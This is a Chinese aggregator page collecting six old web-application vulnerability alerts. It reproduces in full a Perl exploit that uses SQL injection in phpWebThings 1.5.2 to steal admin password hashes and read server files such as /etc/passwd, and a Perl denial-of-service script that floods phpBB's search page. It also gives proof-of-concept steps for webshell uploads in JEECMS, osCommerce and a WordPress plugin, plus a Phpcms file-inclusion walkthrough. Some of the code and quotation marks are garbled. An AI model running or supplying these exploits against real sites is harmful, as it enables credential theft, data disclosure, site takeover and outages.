【导语】“cvvvv9”通过精心收集,向本站投稿了6篇phpWebThings = 1.5.2 MD5 Hash恢复/文件公开远程漏洞漏洞预警,下面就是小编整理后的phpWebThings = 1.5.2 MD5 Hash恢复/文件公开远程漏洞漏洞预警,希望大家喜欢。
- 目录
篇1:phpWebThings = 1.5.2 MD5 Hash恢复/文件公开远程漏洞漏洞预警
phpWebThings <= 1.5.2 MD5 Hash恢复/文件公开远程漏洞
注:
1,无论php.ini如何设置此漏洞都有效;
2,wt_config.php 包含mysql登录
简要说明:
phpWebThings包括一个可以让攻击者执行SQL注入攻击的缺陷,此问题由于fdown.php脚本未能恰当的处理用户提供输入的“id”变量引起。而这将可能允许攻击者注入或者执行后台数据库SQL请求。
#!/usr/bin/perl
###################################################################################################
# phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Remote Exploit #
# #
# by staker #
# ------------------------------ #
# mail: staker[at]hotmail[dot]it #
# url: phpwebthings.nl #
# ------------------------------ #
# #
# NOTE: #
# 1. it works regardless of php.ini settings #
# 2. wt_config.php contains mysql login #
# #
# short explanation: #
# ---------------------------------------------------- #
# phpWebThings contains a flaw that allows an attacker #
# to carry out an SQL injection attack. The issue is #
# due to the fdown.php script. not properly sanitizing #
# user-supplied input to the 'id' variable. This may #
# allow an attacker to inject or manipulate #
# SQL queries in the backend database (php.ini indep) #
# ---------------------------------------------------- #
# #
# [file: fdown.php] #
# ------------------------------------ #
# #
#
# include_once(“core/main.php”); #
# #
# $ret = db_query(“select file from {$config[”prefix“]}_forum_msgs where cod={$_REQUEST[”id“]}”); #
# $row = db_fetch_array($ret); #
# header('HTTP/1.1 200 OK'); #
# header('Date: ' . date(“D M j G:i:s T Y”)); #
# header('Last-Modified: ' . date(“D M j G:i:s T Y”)); #
# header(“Content-Type: application/force-download”); #
# header(“Content-Lenght: ” . (string)(filesize(“var/forumfiles/{$row[”file“]}”))); #
# header(“Content-Transfer-Encoding: Binary”); #
# header(“Content-Disposition: attachment; filename={$row[”file“]}”); #
# readfile(“var/forumfiles/{$row[”file“]}”); #
# #
# ?> #
# #
# ------------------------------------- #
# #
# yeat@snippet:~/Desktop$ perl a.pl localhost/cms -c 1 #
# [*--------------------------------------------------------------------*] #
# [* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit *] #
# [*--------------------------------------------------------------------*] #
# [* Usage: perl web.pl [target + path] [OPTIONS] *] #
# [* *] #
# [* Options: *] #
# [* [files] -d ../../../../../../etc/passwd *] #
# [* [hash.] -c user_id *] #
# [* [table] -t set a table prefix (default: wt) *] #
# [*--------------------------------------------------------------------*] #
# [* MD5 Hash: f2c79ad3d1f03ba266dc0a85e1266671 #
# #
# ---------------------------------------------------------- #
# Today is: 12 June 2009 #
# Location: Italy,Turin. #
# www. .com/watch?v=E78BGajeuAI&feature=related #
# ---------------------------------------------------------- #
###################################################################################################
use LWP::UserAgent;
use Getopt::Long;
&phpWebThings::init;
my ($files,$admin,$ua_lib,$domain,$table);
$domain = $ARGV[0] || exit(0);
$ua_lib = LWP::UserAgent->new(
timeout =>5,
max_redirect =>0,
agent =>'Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)',
) || die $!;
GetOptions(
'p=s' =>\\$proxy,
'd=s' =>\\$files,
'c=i' =>\\$admin,
't=s' =>\\$table,
);
die(&phpWebThings::Exploit);
sub phpWebThings::Exploit
{
return Disclose::File($files) if defined $files;
return Retrieve::Hash($admin) if defined $admin;
}
sub Disclose::File
{
my $filename = $_[0] || die $!;
my $keywords = “\\x2F\\x66\\x64\\x6F\\x77\\x6E\\x2E\\x70\\x68\\x70”;
my $response = $ua_lib->post(parse::URL($domain.$keywords),
[ id =>“1/**/union/**/select/**/0x”.Hex::convert($filename).“#” ]);
if ($response->status_line =~ /^(302|200|301)/) {
return $response->content;
}
else {
return $response->as_string;
}
}
sub Retrieve::Hash()
{
my $user_id = $_[0] || die $!;
my $keywords = “\\x2F\\x66\\x64\\x6F\\x77\\x6E\\x2E\\x70\\x68\\x70”;
my $prefix = (defined $table) ? $table : 'wt';
my $response = $ua_lib->post(parse::URL($domain.$keywords),
[ id =>“1 UNION Select password FROM ${prefix}_users Where uid=$user_id#” ]);
if ($response->status_line =~ /^(302|200|301)/)
{
if ($response->content =~ /([0-9a-f]{32})/) {
return “[* MD5 Hash: $1\\n”;
}
}
else {
return $response->as_string;
}
}
sub Hex::convert()
{
my $string = shift @_ || die $!;
return unpack(“H*”,$string);
}
sub parse::URL()
{
my $string = shift @_ || die($!);
if ($string !~ /^http:\\/\\/?/i) {
$string = ''.$string;
}
return $string;
}
sub phpWebThings::init
{
print “[*--------------------------------------------------------------------*]\\n”.
“[* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit *]\\n”.
“[*--------------------------------------------------------------------*]\\n”.
“[* Usage: perl web.pl [target + path] [OPTIONS] *]\\n”.
“[* *]\\n”.
“[* Options: *]\\n”.
“[* [files] -d ../../../../../../etc/passwd *]\\n”.
“[* [hash.] -c user_id *]\\n”.
“[* [table] -t set a table prefix (default: wt) *]\\n”.
“[*--------------------------------------------------------------------*]\\n”;
}
篇2:Phpcms 2007 远程文件包含漏洞漏洞预警
[zz]Phpcms 2007 远程文件包含漏洞
url:www.wolvez.org/forum/redirect.php?tid=182&goto=lastpost
这个漏洞是一个比较普通的变量覆盖漏洞,这里转一下是由于发现这个漏洞如果是白盒那要都仔细看代码才行 :)
引用 :
------------------------------------------------
//从头开始看
$rootdir = str_replace(“\\\\”, '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php';//通过extract可以覆盖$rootdir为任意值
require PHPCMS_ROOT.'/languages/'.$CONFIG['adminlanguage'].'/yp_admin.lang.php';
if(!$_username) showmessage($LANG['please_login'],$PHPCMS['siteurl'].'member/login.php?forward='.$PHP_URL);
require $rootdir.'/web/admin/include/common.inc.php ';//触发远程文件包含
------------------------------------------------
注意看里面的2个require,第一个那引进的extract的代码,第2个require才导致漏洞的函数,
Phpcms 2007 远程文件包含漏洞漏洞预警
,
伪代码:
$rootdir = str_replace(“\\\\”, '/', dirname(__FILE__));
//下面就是require $rootdir.'/include/common.inc.php';引入的代码
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
unset($_POST, $_GET);
require $rootdir.'/web/admin/include/common.inc.php
?>
不知道看到这里,看官们有什么感想?如果这里用grep等软件去找静态的上跟踪这个的话障很再可能就会漏调着可能分析得到的结果是:
$rootdir = str_replace(“\\\\”, '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php'
require $rootdir.'/web/admin/include/common.inc.php
一看$rootdir被过滤了,就会认为这里安全了?
所以一味的grep等静态去找,是找不到这样的bug的上...
来个“马后炮”,对于这样的上用灰盒测试可能效果很好:就是先看代码看common.inc.php这个躯干里发现用变量覆盖,然后黑盒去找跑那些变量可以覆盖.....
篇3:JEECMS漏洞(文件上传)漏洞预警
漏洞描述:这个漏洞很简单,上传没有过滤,注册账号之后去上传头像,jsp 都可以,会提示上传类型错误,弹出对话框,不用管它,关闭弹窗,点击右键查看源代码,你的代码已经上传上了,
JEECMS最新漏洞(文件上传)漏洞预警
,
上传后的格式为:
www.xxx.com/online/upload/M0000002012070500007/1349769169860.jsp?o=vLogin
篇4:osCommerce 2.3.1 (bannermanager.php)远程文件上传漏洞漏洞预警
osCommerce是一款开放源代码的电子商务程序,osCommerce 2.3.1中的banner_manager.php存在文件上传漏洞,可能导致攻击者直接获取webshell,
[+]info:
~~~~~~~~~
osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability
# Google Dork: [powered by oscommerce] (we will automatically add these to the GHDB)
# Date: [13-05-2011]
# Author: [Number 7]
# Software Link: [www.oscommerce.com/ext/oscommerce-2.3.1.zip]
# Version: [2.3.1]
# Tested on: [Linux-apache-win03-mac Os .... ]
# CVE : [if exists]
[+]poc:
~~~~~~~~~
you will find your shell in
www.badguest.cn/path/images/yourshell.php
篇5:WordPress EditorMonkey (FCKeditor)远程文件上传漏洞漏洞预警
EditorMonkey是WordPress中的一款插件,EditorMonkey中的FCKeditor编辑器存在远程文件上传漏洞,可能导致攻击者直接利用该漏洞获取webshell,
[+]info:
~~~~~~~~~
## WordPress EditorMonkey (FCKeditor) Remote File Upload
## Author : kaMtiEz (kamtiez@exploit-id.com)
## Homepage : www.indonesiancoder.com / exploit-id.com / magelangcyber.web.id
## Date : 14 May, 2011
[+]poc:
~~~~~~~~~
[ Vulnerable File ]
127.0.0.1/[kaMtiEz]/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
[ Shell ]
127.0.0.1/[kaMtiEz]/UserFiles/YourFile.txt
[+]Reference:
~~~~~~~~~
www.exploit-db.com/exploits/17284
篇6:phpBB远程拒绝服务漏洞漏洞预警
phpBB远程拒绝服务漏洞
漏洞版本:
phpBB phpBB 3.0.8
phpBB phpBB 3.0.7
phpBB phpBB 3.0.6
phpBB phpBB 3.0.5
phpBB phpBB 3.0.4
phpBB phpBB 3.0.3
phpBB phpBB 3.0.2
phpBB phpBB 3.0.1
phpBB phpBB 3.0
phpBB phpBB 2.0.21
phpBB phpBB 2.0.19
phpBB phpBB 2.0.17
phpBB phpBB 2.0.16
phpBB phpBB 2.0.15
phpBB phpBB 2.0.14
phpBB phpBB 2.0.13
phpBB phpBB 2.0.12
phpBB phpBB 2.0.11
phpBB phpBB 2.0.10
phpBB phpBB 2.0.9
phpBB phpBB 2.0.7
phpBB phpBB 2.0.6
phpBB phpBB 2.0.5
phpBB phpBB 2.0.4
phpBB phpBB 2.0.3
phpBB phpBB 2.0.2
phpBB phpBB 2.0.1
phpBB phpBB 1.4.4
phpBB phpBB 1.4.2
phpBB phpBB 1.4.1
phpBB phpBB 1.2.1
phpBB phpBB 2.0.22
phpBB phpBB 2.0.20
phpBB phpBB 2.0.18
漏洞描述:
Bugtraq ID:65481
phpBB是phpBB组开发的一套开源的使用PHP语言开发的Web论坛软件,该软件具有支持多国语言、支持多种数据库和自定义版面设计等特点。
phpBB中存在远程拒绝服务漏洞。攻击者可利用该漏洞造成受影响应用程序崩溃,拒绝服务合法用户。
<* 参考
www.securityfocus.com/bid/65481
sebug.net/appdir/phpBB
*>
测试方法:
@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
###########################
# Phpbb Forum Denial of Service Vulnerability
###########################
#!/usr/bin/perl
# Iranian Exploit DataBase
# Phpbb Forum Denial of Service Vulnerability
# Version: All Version
# Vendor site : www.phpbb.com
# Code Written By Amir – iedb.team@gmail.com – o0_iedb_0o@yahoo.com
# Site : Www.IeDb.Ir – Www.IrIsT.Ir
# Fb Page :
www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
# Greats : TaK.FaNaR – ErfanMs – Medrik – F@riD – Bl4ck M4n – 0x0ptim0us
- 0Day – Dj.TiniVini – E2MA3N
# l4tr0d3ctism – H-SK33PY – Noter – r3d_s0urc3 – Dr_Evil And All
Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\\/\\/)//eg;
for ($i=0; $i<10; $i–)
{
$data =
“securitytoken=guest&do=process&query=%DB%8C%D8%B3%D8%A8%D9%84%D8%B3%DB%8C%D9%84%D8%B3%DB%8C%D8%A8%D9%84%0%0%0%0%0%0%0%0%0%0&submit.x=0&submit.y=0″;
$len = length $data;
$foo = “POST “.$dir.”search.php?do=process HTTP/1.1\\r\\n”.
“Accept: * /*\\r\\n”.
“Accept-Language: en-gb\\r\\n”.
“Content-Type: application/x-www-form-urlencoded\\r\\n”.
“Accept-Encoding: gzip, deflate\\r\\n”.
“User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\\r\\n”.
“Host: $host\\r\\n”.
“Content-Length: $len\\r\\n”.
“Connection: Keep-Alive\\r\\n”.
“Cache-Control: no-cache\\r\\n\\r\\n”.
“$data”;
my $port = “80″;
my $proto = getprotobyname(‘tcp’);
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,”$foo”, 0);
syswrite STDOUT, “+” ;
}
print “\\n\\n”;
system(‘ping $host’);
sub usage {
print “\\n”;
print “################################################# \\n”;
print “## Phpbb Forum Denial of Service Vulnerability\\n”;
print “## Discoverd By Amir – iedb.team@gmail.com – Id : o0_iedb_0o \\n”;
print “## Www.IeDb.Ir – Www.IrIsT.Ir \\n”;
print “################################################# \\n”;
print “## [host] [path] \\n”;
print “## host.com /forum/\\n”;
print “################################################# \\n”;
print “\\n”;
exit();
};
#####################################
# Archive Exploit = www.iedb.ir/exploits-868.html
#####################################
###########################
# Iranian Exploit DataBase = IeDb.Ir [2013-11-17]
###########################
安全建议:
目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.phpbb.com/
★ ewebeditor(PHP) Ver 3.8 任意文件上传0day漏洞预警
★ Freefloat FTP Server多个命令远程缓冲区溢出漏洞漏洞预警
★ 漏洞整改报告
★ Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警
★ 永久网络个人音乐盒LajoxBox v1.1上传漏洞利用漏洞预警
★ 财务部里的漏洞
phpWebThings = 1.5.2 MD5 Hash恢复/文件公开远程漏洞漏洞预警(精选6篇)
